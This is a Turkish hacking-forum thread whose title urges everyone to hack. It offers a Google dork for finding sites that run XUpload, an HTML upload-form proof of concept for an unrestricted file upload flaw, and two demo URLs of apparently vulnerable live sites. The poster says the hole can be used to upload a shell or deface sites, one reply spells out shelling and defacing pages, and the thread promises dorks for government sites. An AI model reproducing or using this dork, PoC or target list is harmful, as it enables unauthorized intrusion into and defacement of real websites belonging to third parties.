Exploit XUpload Dork / Her Kes Hack Yapsin... (1 Viewer)

Merhaba Yeni Cikan Dork Bu Iyi Heyklemeler Her Kese.. Yakinda Iyi Videolar Olacak .gov Ile Alakali Dorklar.

XUpload Uzaktan Dosya Yükleme Güvenlik Açığı 2020.11.04 Risk: Yüksek Yerel: Hayır Uzaktan: Evet CVE: Yok CWE: CWE-434 Dork: intext: "XUpload Tarafından Desteklenmektedir" # Başlık: XUpload Uzaktan Dosya Yükleme Güvenlik Açığı # tarih: 2020-11-04 # Üzerinde test edildi: Windows 10 ve Google Chrome # Kategori: Web Uygulama Hataları # Dork: intext: "XUpload Tarafından Desteklenmektedir" ### NOT: * Kabuğunuzu yüklemek veya tahrif etmek için atlayabilirsiniz. ### POC: * Exploit 1: site.com/[folder]/[file] <form enctype = "multipart / form-data" action = "/ cgi-bin / upload.cgi? upload_id =" method = "post" onSubmit = "return StartUpload (this);" target = "xupload"> Dosya gönder: <input name = "file_1" type = "file" onChange = "checkExt (this.value)"> <br> Yorum: <input type = "text" name = "comment"> (isteğe bağlı) <br> <br> <Input type = "checkbox" name = "popup"> <label FOR = "popup" ACCESSKEY = "Z"> Yükleme durumunu açılır pencerede göster </label> <br> <br> <input type = "submit" value = "Dosya Yükle"> </form> ### Demo: * http://www.satyrlp.sorokine.fr * http://50.116.78.206/uploadtest/upload_form.html

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Eline sağlık reis

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Eline emegine saglik Taleh

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Güzel gerekliydi deneyelim bakalım, teşekkürler.

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Eyw reis bende ariyordum

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Bu ne anlatacak var mı

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Güzel gerekliydi deneyelim bakalım, teşekkürler.

Eyv Bakariz Tabii

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Bu ne anlatacak var mı

Bu bi dork qardas web sitede olan cms yuklulerin bosluklarini ariyoraun bulup shell atip index yediriyon bu gibi yani. Ayrica yeniysense arastir forumu ilgili konular vardir bi suru

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Eyw aga

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

EMEĞİNE SAĞLIK DOSTUM

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl

 

Bklm

🔒 Bu içeriği görmek için giriş yapın

Giriş Yap Forum Kayıt Ol Telegram Grubumuza Katıl